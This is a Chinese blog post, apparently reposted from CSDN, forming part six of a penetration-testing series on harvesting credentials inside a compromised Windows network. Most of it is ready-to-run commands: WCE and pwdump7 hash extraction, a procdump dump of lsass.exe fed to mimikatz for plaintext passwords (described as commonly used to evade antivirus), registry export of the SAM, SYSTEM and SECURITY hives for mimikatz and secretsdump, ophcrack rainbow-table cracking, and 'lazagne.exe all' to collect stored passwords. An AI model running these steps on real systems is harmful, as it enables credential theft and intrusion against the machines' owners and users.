内网渗透之内网信息收集(六)

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

目录

凭证信息收集

05wce

06pwddump7

07ophcrack

08Procdump+Mimikatz (常用免杀)

09注册表导出hash

10lazagne

内网渗透之内网信息收集(七)_不知名白帽的博客-CSDN博客

05wce

WCE:windows credentials editor

WCE是跟mimikatz齐名的一款hash管理工具

官网地址:https://www.ampliasecurity.com/research.html

32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

历史版本下载:https://www.ampliasecurity.com/research/windows-credentials-editor/

WCE使用说明:

img

wce.exe -l(获取用户哈希)

img

wce.exe -w(获取用户明文密码)

img

06pwddump7

这款工具可以读取出当前系统的各个用户的密码hash(包括LM和NTLM)

在命令行输入Pwddump7.txt就可以读取出hash并显示出来,也可以保存到一个文件中

img

07ophcrack

如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。

工具下载:https://ophcrack.sourceforge.io/

彩虹表:

https://ophcrack.sourceforge.io/tables.php

http://project-rainbowcrack.com/table.htm

08Procdump+Mimikatz (常用免杀)

Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Procdump lsass 进程导出:

For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp

For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

img

然后使用mimikatz还原密码:

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

img

09注册表导出hash

reg save HKLMSYSTEM system.hiv

reg save HKLMSAM sam.hiv

reg save HKLMSECURITY security.hiv

导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。

mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

10lazagne

LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序。 每个软件都使用不同的技术(纯文本、API、自定义算法、 数据库等)存储其密码。LaZagne 的作用就是找到最常用的一些软件的密码。 LaZagne 几乎支持市面上大部分常用工具。包括浏览器、Git、SVN、Wifi、Databases 等。但是对聊天软件的支持不够本土化,主要支持一些国外的聊天软件。

抓取所有支持软件的密码:

lazagne.exe all

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125644747
-- 展开阅读全文 --
安全面试之XSS(跨站脚本攻击)
« 上一篇 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复